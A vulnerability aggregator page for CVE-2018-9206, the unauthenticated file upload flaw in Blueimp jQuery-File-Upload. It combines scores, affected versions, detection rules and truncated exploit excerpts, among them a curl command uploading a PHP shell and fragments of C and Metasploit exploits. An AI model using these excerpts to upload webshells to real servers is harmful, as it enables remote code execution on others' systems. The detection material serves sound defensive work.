CVE-2018-9206
published 2018-10-11CVE-2018-9206: Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
97.11%
99.9th percentile
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blueimp | blueimp_jquery-file-upload | unspecified – 9.22.0 | — |
| debian | libjs-jquery-file-upload | < libjs-jquery-file-upload 9.25.0-1 (bookworm) | libjs-jquery-file-upload 9.25.0-1 (bookworm) |
| jquery_file_upload_project | jquery_file_upload | <= 9.22.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
yara↗
id: CVE-2018-9206
http:
- raw:
- POST {{path}} HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
------WebKitFormBoundary{{randstr}}
Content-Disposition: form-data; name="files[]"; filename="{{filename}}.php"
Content-Type: application/x-php
matchers:
- type: dsl
dsl:
- "contains(body, '{{md5(hash)}}')"
- "status_code == 200"
condition: and- →Look for multipart/form-data POST requests uploading .php files to known jQuery File Upload handler paths (server/php/index.php, example/upload.php, php/index.php, server/php/UploadHandler.php, server/php/upload.class.php). The Content-Disposition header will contain filename="*.php" and Content-Type: application/x-php. ↗
- →After upload, attackers probe for the uploaded PHP webshell under the /files/ subdirectory relative to the upload handler path (e.g., GET /server/php/files/<filename>.php). Monitor for GET requests to these paths returning HTTP 200. ↗
- →The exploit uses a distinctive User-Agent string. Correlate HTTP logs for this UA combined with POST requests to jQuery File Upload handler paths. ↗
- →The vulnerability is triggered because Apache 2.3.9+ ignores .htaccess files in the upload directory when AllowOverride is set to None, allowing PHP files to be executed. Check Apache configuration for AllowOverride None in directories served by the jQuery File Upload plugin. ↗
- →The exploit script probes for bower.json and package.json to fingerprint the plugin version before exploitation. Monitor for sequential GET requests to bower.json or package.json followed by POST to upload handler paths. ↗
- →The exploit also checks for index.html to detect the plugin's GUI. Monitor for GET requests to /index.html that contain 'jquery file upload' in the response, followed by upload attempts. ↗
- ·The vulnerability is only exploitable on Apache web servers running version 2.3.9 or later where AllowOverride is set to None (or equivalent), causing the plugin's .htaccess security restrictions to be ignored. Servers with AllowOverride All or explicit directory restrictions may not be exploitable via this path. ↗
- ·Over 7,800 forks of the jQuery File Upload plugin on GitHub are likely also vulnerable. Detection and patching efforts must account for forked/derivative implementations, not just the canonical blueimp repository. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_debian9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Unrestricted Upload of File with Dangerous Type in blueimp-file-upload
osv·2018-10-22
CVE-2018-9206 [CRITICAL] Unrestricted Upload of File with Dangerous Type in blueimp-file-upload
Unrestricted Upload of File with Dangerous Type in blueimp-file-upload
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
GHSA
Unrestricted Upload of File with Dangerous Type in blueimp-file-upload
ghsa·2018-10-22
CVE-2018-9206 [CRITICAL] CWE-434 Unrestricted Upload of File with Dangerous Type in blueimp-file-upload
Unrestricted Upload of File with Dangerous Type in blueimp-file-upload
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
OSV
CVE-2018-9206: Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9
osv·2018-10-11·CVSS 9.8
CVE-2018-9206 [CRITICAL] CVE-2018-9206: Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
VulnCheck
jquery_file_upload_project jquery_file_upload Unrestricted Upload of File with Dangerous Type
vulncheck·2018·CVSS 9.8
CVE-2018-9206 [CRITICAL] jquery_file_upload_project jquery_file_upload Unrestricted Upload of File with Dangerous Type
jquery_file_upload_project jquery_file_upload Unrestricted Upload of File with Dangerous Type
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
Affected: jquery_file_upload_project jquery_file_upload
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-9206; https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/; https://www.akamai.com/blog/security/what-happens-when-your-vulnerability-is-weaponized-for-botnet-proliferation; https://app.crowdsec.net/cti/cve-explorer/CVE-2018-9206
Exploit PoC: https://vulncheck.com/xdb/e812f9642840; https:
Debian
CVE-2018-9206: libjs-jquery-file-upload - Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Uploa...
vendor_debian·2018·CVSS 9.8
CVE-2018-9206 [CRITICAL] CVE-2018-9206: libjs-jquery-file-upload - Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Uploa...
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
Scope: local
bookworm: resolved (fixed in 9.25.0-1)
bullseye: resolved (fixed in 9.25.0-1)
forky: resolved (fixed in 9.25.0-1)
sid: resolved (fixed in 9.25.0-1)
trixie: resolved (fixed in 9.25.0-1)
Suricata
ET WEB_SERVER jQuery File Upload Attempt
suricata·2018-10-25·CVSS 9.8
CVE-2018-9206 [CRITICAL] ET WEB_SERVER jQuery File Upload Attempt
ET WEB_SERVER jQuery File Upload Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER jQuery File Upload Attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/php/"; http.request_body; content:"name=|22|files|22 3b|"; content:"<?php"; nocase; reference:url,github.com/lcashdol/Exploits/tree/master/CVE-2018-9206; reference:cve,2018-9206; classtype:web-application-attack; sid:2026552; rev:4; metadata:affected_product PHP, attack_target Server, created_at 2018_10_25, cve CVE_2018_9206, deployment Datacenter, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_08_27;)
Exploit-DB
Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
exploitdb·2019-01-16·CVSS 9.8
CVE-2018-9206 [CRITICAL] Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
---
# Exploit Title: Exploit for Blueimp's jQuery File Upload
#include
#include
#include
#include
#include
#include
#define BSIZE 1024
#define DEBUG 1
#define TESTONLY 0
void build_string (char *p, char *path, char *arg, char *ar1, int func);
int
main (int argc, char *argv[])
{
int sock = 0, bytes_read = 0, total = 0, function = 0;
struct sockaddr_in serv_addr;
char buffer[BSIZE] = { 0 }, payload[BSIZE] = { 0};
if (argc \r\n\r\n--------------------------c8e05c8871143853--\r\n\r\n",path, arg);
}
Exploit-DB
blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)
exploitdb·2018-11-06·CVSS 9.8
CVE-2018-9206 [CRITICAL] blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)
blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "blueimp's jQuery (Arbitrary) File Upload",
'Description' => %q{
This module exploits an arbitrary file upload in the sample PHP upload
handler for blueimp's jQuery File Upload widget in versions [
'Claudio Viviani', # WordPress Work the Flow (Arbitrary) File Upload
'Larry W. Cashdollar', # (Re)discovery, vendor disclosure, and PoC
'wvu' # Metasploit module
],
'References' => [
['CVE', '2018-9206'],
['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
['URL', 'https://github.com/lcashdol/Explo
Exploit-DB
jQuery-File-Upload 9.22.0 - Arbitrary File Upload
exploitdb·2018-10-11·CVSS 9.8
CVE-2018-9206 [CRITICAL] jQuery-File-Upload 9.22.0 - Arbitrary File Upload
jQuery-File-Upload 9.22.0 - Arbitrary File Upload
---
# Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload
# Author: Larry W. Cashdollar, @_larry0
# Date: 2018-10-09
# Vendor: https://github.com/blueimp
# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
# CVE-ID: N/A
# Vulnerability:
# The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php
# doesn't require any validation to upload files to the server. It also doesn't exclude file types.
# This allows for remote code execution.
# shell.php:
# Exploit Code:
$ curl -F "[email protected]" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
#!/bin/bash
USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
PATHS=("server/p
Metasploit
blueimp's jQuery (Arbitrary) File Upload
metasploit
blueimp's jQuery (Arbitrary) File Upload
blueimp's jQuery (Arbitrary) File Upload
This module exploits an arbitrary file upload in the sample PHP upload handler for blueimp's jQuery File Upload widget in versions <= 9.22.0. Due to a default configuration in Apache 2.3.9+, the widget's .htaccess file may be disabled, enabling exploitation of this vulnerability. This vulnerability has been exploited in the wild since at least 2015 and was publicly disclosed to the vendor in 2018. It has been present since the .htaccess change in Apache 2.3.9. This module provides a generic exploit against the jQuery widget.
Nuclei
Blueimp jQuery-File-Upload v9.22.0 - Unrestricted File Upload
nuclei·CVSS 9.8
CVE-2018-9206 [CRITICAL] Blueimp jQuery-File-Upload v9.22.0 - Unrestricted File Upload
Blueimp jQuery-File-Upload v9.22.0 - Unrestricted File Upload
Blueimp jQuery-File-Upload v9.22.0 contains an unauthenticated arbitrary file upload caused by insufficient validation in the upload component, letting remote attackers upload malicious files, exploit requires no authentication.
Template:
id: CVE-2018-9206
info:
name: Blueimp jQuery-File-Upload v9.22.0 - Unrestricted File Upload
author: thewindghost
severity: critical
description: |
Blueimp jQuery-File-Upload v9.22.0 contains an unauthenticated arbitrary file upload caused by insufficient validation in the upload component, letting remote attackers upload malicious files, exploit requires no authentication.
impact: |
Attackers can upload malicious files, potentially leading to remote code execution or server compromise.
reme
Tenable
jQuery File Upload Plugin Leaves Web Servers Vulnerable to Unauthenticated File Upload Attacks
blogs_tenable·2018-10-19
jQuery File Upload Plugin Leaves Web Servers Vulnerable to Unauthenticated File Upload Attacks
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
jQuery File Upload Plugin Leaves Web Servers Vulnerable to Unauthenticated File Upload Attacks
blogs_tenable·2018-10-19·CVSS 9.8
[CRITICAL] jQuery File Upload Plugin Leaves Web Servers Vulnerable to Unauthenticated File Upload Attacks
Blog / Cyber Exposure Alerts
Subscribe
# jQuery File Upload Plugin Leaves Web Servers Vulnerable to Unauthenticated File Upload Attacks
Ryan Seguin
October 19, 2018
2 Min Read
Akamai disclosed that the popular jQuery File Upload plugin has been vulnerable to an unauthenticated file upload flaw since November 2010.
## Background
Akamai’s Security Intelligence Response Team (SIRT) recently disclosed that the popular jQuery File Upload plugin -- the second most-starred plugin on Github in the jQuery project -- has been vulnerable to an unauthenticated file upload flaw (CVE-2018-9206) on Apache web servers since November 2010.
## Impact assessment
Larry Cashdollar, a security researcher for Akamai's SIRT, said in an interview with ZDNet that he’s seen active exploitation of this vulne
Bugzilla
CVE-2018-9206 js-jquery-file-upload: Unauthenticated arbitrary file upload
bugzilla·2018-10-11·CVSS 9.8
CVE-2018-9206 [CRITICAL] CVE-2018-9206 js-jquery-file-upload: Unauthenticated arbitrary file upload
CVE-2018-9206 js-jquery-file-upload: Unauthenticated arbitrary file upload
The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution.
Upstream patch:
https://github.com/blueimp/jQuery-File-Upload/pull/3514
References:
http://www.vapidlabs.com/advisory.php?v=204
Discussion:
Created js-jquery-file-upload tracking bugs for this issue:
Affects: fedora-all [bug 1638551]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Bugzilla
CVE-2018-9206 js-jquery-file-upload: Unauthenticated arbitrary file upload [fedora-all]
bugzilla·2018-10-11·CVSS 9.8
CVE-2018-9206 [CRITICAL] CVE-2018-9206 js-jquery-file-upload: Unauthenticated arbitrary file upload [fedora-all]
CVE-2018-9206 js-jquery-file-upload: Unauthenticated arbitrary file upload [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supporte
http://www.securityfocus.com/bid/105679http://www.securityfocus.com/bid/106629http://www.vapidlabs.com/advisory.php?v=204https://wpvulndb.com/vulnerabilities/9136https://www.exploit-db.com/exploits/45790/https://www.exploit-db.com/exploits/46182/https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.htmlhttp://www.securityfocus.com/bid/105679http://www.securityfocus.com/bid/106629http://www.vapidlabs.com/advisory.php?v=204https://wpvulndb.com/vulnerabilities/9136https://www.exploit-db.com/exploits/45790/https://www.exploit-db.com/exploits/46182/https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
2018-10-11
Published
Exploited in the wild